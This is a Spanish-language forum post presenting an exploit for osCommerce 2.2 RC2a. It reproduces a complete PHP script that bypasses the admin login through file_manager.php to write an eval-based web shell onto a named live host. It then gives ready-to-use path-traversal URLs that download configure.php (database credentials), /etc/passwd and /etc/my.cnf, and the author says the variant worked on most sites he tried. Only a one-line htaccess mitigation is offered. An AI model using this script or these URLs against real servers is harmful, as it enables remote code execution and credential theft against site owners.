Autor
He descubierto una variante del exploit publicada por Flyh4t en el sitio de milw0rm.com
http://www.milw0rm.com/exploits/9556
En este exploit no se explica la vulnerabilidad pero parece ser problema del archivo file_manager.php, ya que se puede bypassear al login.php.
En fin, este exploit describe que con la accion save (login.php?action=save) se puede crear un archivo con una shell en php.
Código:
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
# milw0rm.com [2009-08-31]
Me di a la tarea de analizar el archivo y descubrí que la accion save no es la única que nos puede dar beneficios, ya que en el archivo está dada de alta otra funcion llamada download. De esta manera especificando la acción download con el respectivo nombre de archivo (login.php?action=download&filename=archivo) se pueden descargar archivos del servidor.
Qué diferencia hay entre el exploit publicado en milw0rm y la variante que les presento???. Bueno que en la mayoría de los sitios que probé no tenian permisos para escribir en ese directorio, por lo cual el exploit de milw0rm no pegó. En cambio con la variante pude descargarme los archivos en todo el server (con safe mode off)
.En estos momentos estoy buscando en el código cuál fue el problema. El vendor dice que ya se hicieron los fix al problema,etc...
Conclusión:
Exploits:
(Archivo de configuraciones con el user y pass de la db)
http://vulnsite/admin/file_manager.php/login.php?action=download&filename=includes/configure.php
Ejemplo de descarga de otros archivos en el servidor no relacionados a oscommerce.
http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/passwd
http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/my.cnf
Solución más rápida: Configurar htaccess para impedir acceder a estos directorios y archivos sin firmarse.
Se aceptan críticas y comentarios.
En línea
